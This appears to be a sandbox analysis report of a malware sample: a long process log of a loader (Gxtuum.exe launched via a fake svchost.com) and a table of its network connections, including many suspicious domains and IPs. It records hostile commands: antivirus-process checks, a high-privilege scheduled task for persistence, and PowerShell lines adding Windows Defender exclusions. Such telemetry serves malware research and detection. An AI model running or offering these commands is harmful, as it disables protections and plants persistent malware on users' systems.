"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c md 369580
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V "MaskBathroomsCompoundInjection" Participants
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif
369580\Origin.pif 369580\Z
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\System.exe
C:\Users\Admin\AppData\Local\Temp\Files\System.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe
"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| HK | 103.149.92.191:80 | tcp | |
| CN | 101.133.156.69:7777 | tcp | |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 8.8.8.8:53 | 217.113.215.185.in-addr.arpa | udp |
| IN | 122.170.110.131:9105 | 122.170.110.131 | tcp |
| US | 8.8.8.8:53 | 131.110.170.122.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 79.113.190.64.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 83.149.17.194:80 | 83.149.17.194 | tcp |
| US | 8.8.8.8:53 | 194.17.149.83.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| DE | 136.243.104.235:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.ammyy.com | udp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 118.18.243.136.in-addr.arpa | udp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.89:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.179.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| US | 8.8.8.8:53 | 17.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | push-hook.cyou | udp |
| US | 104.21.10.6:443 | push-hook.cyou | tcp |
| US | 8.8.8.8:53 | processhol.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | librari-night.sbs | udp |
| US | 8.8.8.8:53 | befall-sm0ker.sbs | udp |
| US | 8.8.8.8:53 | 6.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | p10tgrace.sbs | udp |
| US | 8.8.8.8:53 | peepburry828.sbs | udp |
| US | 8.8.8.8:53 | owner-vacat10n.sbs | udp |
| US | 8.8.8.8:53 | 3xp3cts1aim.sbs | udp |
| US | 8.8.8.8:53 | p3ar11fter.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| TH | 45.141.26.170:80 | 45.141.26.170 | tcp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 170.26.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.235.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SY | 5.134.254.142:40500 | tcp | |
| UZ | 213.230.108.92:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.108.230.213.in-addr.arpa | udp |
| SG | 35.185.187.24:80 | 35.185.187.24 | tcp |
| US | 8.8.8.8:53 | 24.187.185.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 188.215.221.55:40500 | udp | |
| US | 8.8.8.8:53 | 55.221.215.188.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| MX | 189.167.44.219:40500 | udp | |
| TH | 45.141.26.170:7000 | tcp | |
| US | 8.8.8.8:53 | 219.44.167.189.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | reinforcenh.shop | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | gutterydhowi.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | ghostreedmnu.shop | udp |
| US | 8.8.8.8:53 | offensivedzvju.shop | udp |
| US | 8.8.8.8:53 | vozmeatillu.shop | udp |
| IR | 91.185.146.150:40500 | udp | |
| US | 8.8.8.8:53 | 150.146.185.91.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | drawzhotdog.shop | udp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| US | 8.8.8.8:53 | fragnantbui.shop | udp |
